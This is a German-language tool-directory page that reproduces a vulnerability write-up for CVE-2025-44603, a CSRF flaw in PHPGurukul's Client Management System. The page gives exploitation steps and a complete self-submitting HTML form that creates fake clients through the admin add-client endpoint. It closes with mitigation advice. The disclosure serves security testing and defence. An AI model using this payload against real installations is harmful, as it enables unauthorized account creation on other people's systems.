Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/moulish2004/cve-2025-44603-csrf-leads_to_create_fakeusers
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubmoulish2004/cve-2025-44603-csrf-leads_to_create_fakeusers

CVE-2025-44603-CSRF-Leads_to_Create_FakeUsers

Proof-of-Concept, der eine CSRF-Schwachstelle in einem PHP-basierten Client-Management-System demonstriert, mit HTML-Exploit-Code und Mitigationsstrategien für das Testen der Websicherheit.

Repository anzeigen
12vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-44603 (CSRF-Schwachstelle: Führt zur Erstellung gefälschter Clients)

Projektname & Repo-URL: https://phpgurukul.com/client-management-system-using-php-mysql/

Schwachstellenname: Cross-Site Request Forgery (CSRF)

Betroffene Version: V1.2

Einführung

In der Funktion „Client hinzufügen“ des von PHPGurukul entwickelten Client-Management-Systems existiert eine Cross-Site-Request-Forgery (CSRF)-Schwachstelle. CSRF ist ein Angriff, bei dem ein authentifizierter Benutzer dazu verleitet wird, eine bösartige Anfrage an eine Webanwendung zu senden. Dies kann zu unbefugten Aktionen im Namen des Benutzers führen. In diesem Bericht zeigen wir, wie CSRF genutzt werden kann, um gefälschte Benutzer in einem Client-Management-System zu erstellen, und schlagen Abhilfemaßnahmen vor.

Umgebungseinrichtung

  • Lokal gehostetes Client-Management-System unter Verwendung von MySQL und PHP.
  • Funktionalität zum Hinzufügen von Clients und deren Diensten.

Schritte zur Ausnutzung von CSRF

1. Als Administrator anmelden

Melden Sie sich mit den bereitgestellten Anmeldedaten beim Client-Management-System an.

Als Administrator anmelden

2. Einen neuen Client hinzufügen

  • Wählen Sie die Option Client hinzufügen.
  • Geben Sie die erforderlichen Client-Details ein.

Neuen Client hinzufügen Client-Details eingeben

3. Die Client-Hinzufügeanfrage erfassen

  1. Navigieren Sie zum Speichern-Button.
  2. Richten Sie Burp Suite ein, um Anfragen abzufangen.
  3. Klicken Sie auf Speichern und erfassen Sie die HTTP-Anfrage, bevor sie den Server erreicht.
  4. Senden Sie die erfasste Anfrage an den Repeater-Tab ohne das Session-Cookie zur Analyse.

Anfrage in Burp erfassen An Repeater senden

CSRF-Code für gefälschte Clients

Unten ist der HTML PoC für den CSRF-Angriff:

root@kitploit:~
<html>
  <body>
    <form action="http://localhost/clientms/admin/add-client.php" method="POST">
      <input type="hidden" name="accounttype" value="Active Account" />
      <input type="hidden" name="cname" value="moulimurugan" />
      <input type="hidden" name="comname" value="kppr" />
      <input type="hidden" name="address" value="vijayamangalam" />
      <input type="hidden" name="city" value="erode" />
      <input type="hidden" name="state" value="tamil" />
      <input type="hidden" name="zcode" value="638026" />
      <input type="hidden" name="wphnumber" value="968560710" />
      <input type="hidden" name="cellphnumber" value="6931052465" />
      <input type="hidden" name="ophnumber" value="9638560410" />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="password" value="moulimurugan" />
      <input type="hidden" name="websiteadd" value="clientmsdb" />
      <input type="hidden" name="notes" value="Nil" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Erstellen gefälschter Clients

  • Ändern Sie vorhandene Details, um gefälschte Clients zu erstellen

Gefälschten Benutzer hinzufügen 1 Gefälschten Benutzer hinzufügen 2

Testen des CSRF PoC

  1. Öffnen Sie den generierten CSRF-PoC-Link in einem Browser.
  2. Die Webseite öffnet sich mit einem Senden-Button.
  3. Klicken Sie auf Senden, und die Anfrage wird ausgeführt, wodurch gefälschte Clients erstellt werden.

PoC im Browser öffnen Sendeanfrage ausführen

Bestätigung der Erstellung gefälschter Clients

  • Nach dem Senden erscheinen gefälschte Clients im Admin-Dashboard.

Gefälschte Clients erstellt Mehrere Benutzer erstellt

Abhilfemaßnahmen

Um CSRF-Angriffe zu verhindern, implementieren Sie die folgenden Maßnahmen:

  1. CSRF-Token
    • Verwenden Sie Anti-CSRF-Token in allen Formularübermittlungen und überprüfen Sie diese serverseitig.
  2. SameSite-Cookies
    • Setzen Sie Session-Cookies mit den Attributen SameSite=Strict oder SameSite=Lax.
  3. Referer- und Origin-Header-Validierung
    • Validieren Sie die Referer- und Origin-Header, bevor Sie Anfragen verarbeiten.
  4. Benutzerauthentifizierungsprüfungen
    • Fordern Sie CAPTCHAs für kritische Aktionen, um automatisierte Angriffe zu verhindern.
  5. HTTP-Methoden einschränken
    • Verwenden Sie POST für sensible Aktionen und vermeiden Sie die Verarbeitung von GET-Anfragen mit Nebenwirkungen.

Fazit

Dieser Bericht zeigt, wie CSRF-Schwachstellen ausgenutzt werden können, um unbefugte Clients in einem Client-Management-System zu erstellen. Die Implementierung der vorgeschlagenen Abhilfemaßnahmen wird dazu beitragen, die Anwendung vor solchen Angriffen zu schützen.

Tool herunterladen